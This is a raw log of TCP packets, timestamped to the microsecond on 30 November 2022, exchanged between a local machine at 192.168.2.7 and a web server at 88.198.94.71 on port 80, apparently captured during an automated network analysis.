Nov 30, 2022 00:10:05.215678930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.215711117 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.215738058 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.215751886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.215785027 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.215811968 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.215825081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.215857983 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.215884924 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.215898991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.215930939 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.215959072 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.215981007 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216011047 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216051102 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216084003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216120958 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216125965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216159105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216187000 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216200113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216229916 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216231108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216255903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216264009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216283083 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216306925 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216392994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216434002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216454983 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216465950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216496944 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216525078 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216537952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216567993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216569901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216592073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216602087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216634035 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.216664076 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.216690063 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.231254101 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.231709003 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.232516050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232530117 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232542992 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232556105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232569933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232587099 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232599020 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232650995 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232665062 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232731104 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.232743979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232758045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232770920 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232784986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232803106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232815981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232832909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232846022 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232860088 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232877016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232889891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232908010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232922077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232934952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232948065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.232964039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.233053923 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.236160040 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.236175060 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.236479044 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.237437010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.237452030 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.237471104 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.237483978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.237508059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.237538099 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.237549067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.237555981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.237587929 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.237665892 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.237714052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.240353107 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.240370989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.240387917 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.240405083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.240436077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.240466118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.240464926 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.240485907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.240499973 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.240518093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.240518093 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.240556002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.240649939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.241404057 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.241422892 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.241445065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.241461039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.241477966 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.241501093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.241501093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.241532087 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.242434025 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.242450953 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.242472887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.242502928 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.242516041 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.242528915 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.242543936 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.242561102 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.242600918 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.243952036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.243969917 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.243987083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244003057 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244024992 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244035959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244035959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244040966 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244059086 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244059086 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244076014 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244103909 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244155884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244174004 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244196892 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244204998 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244214058 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244230032 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244230032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244246960 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244250059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244262934 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244280100 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244287014 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244298935 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244333982 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244375944 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244391918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244415045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244430065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244452953 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244457960 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244469881 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244487047 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244491100 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244508982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244529963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244533062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244546890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244565010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244569063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244585991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244592905 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244601965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244617939 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244618893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244635105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244652033 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244652987 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244705915 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244707108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244735956 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244752884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244776011 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244792938 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244815111 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244817972 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244829893 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244851112 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244853973 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.244868040 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.244889975 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245001078 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245018005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245028973 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245052099 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245057106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245074034 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245095968 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245145082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245162010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245177984 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245178938 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245194912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245203018 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245256901 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245256901 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245266914 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245282888 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245305061 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245326996 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245332956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245351076 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245377064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245383978 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245383978 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245399952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245435953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245511055 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245544910 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245647907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245665073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245665073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245682001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245698929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245707989 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245714903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245721102 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245732069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245754957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245758057 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245770931 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245795965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245860100 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245877028 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245898008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245920897 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245923996 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245940924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245956898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245961905 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245961905 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.245973110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245994091 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.245996952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.246010065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246026039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246031046 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.246046066 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.246083021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.246129990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246145964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246169090 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246186018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246201038 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246202946 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.246217012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246231079 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.246232986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246253014 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.246288061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.246414900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.246522903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.247072935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247092009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247114897 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247132063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247153044 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247169971 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247191906 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247198105 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.247209072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247235060 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.247284889 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.247709990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247729063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247750044 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247766972 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247787952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247796059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.247805119 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247822046 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.247844934 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247862101 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.247876883 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.247876883 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.247904062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248363018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248379946 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248414993 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248433113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248455048 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248459101 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248492956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248493910 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248519897 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248526096 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248543024 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248564005 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248595953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248626947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248642921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248692036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248708963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248730898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248734951 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248748064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248769045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248780012 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248799086 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.248807907 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248831034 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.248869896 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.249820948 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.249834061 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.249846935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.249860048 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.250150919 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251018047 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251032114 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251127005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251141071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251158953 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251164913 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251173019 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251235962 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251235962 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251494884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251543045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251560926 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251585007 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251596928 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251662016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251676083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251694918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251707077 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251730919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251735926 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251744986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.251770973 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.251810074 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.255872965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.255924940 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256042957 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.256373882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256387949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256402016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256418943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256428957 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.256433964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256447077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256472111 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.256520033 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.256571054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256618977 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.256623983 CET	49708	80	192.168.2.7	88.198.94.71
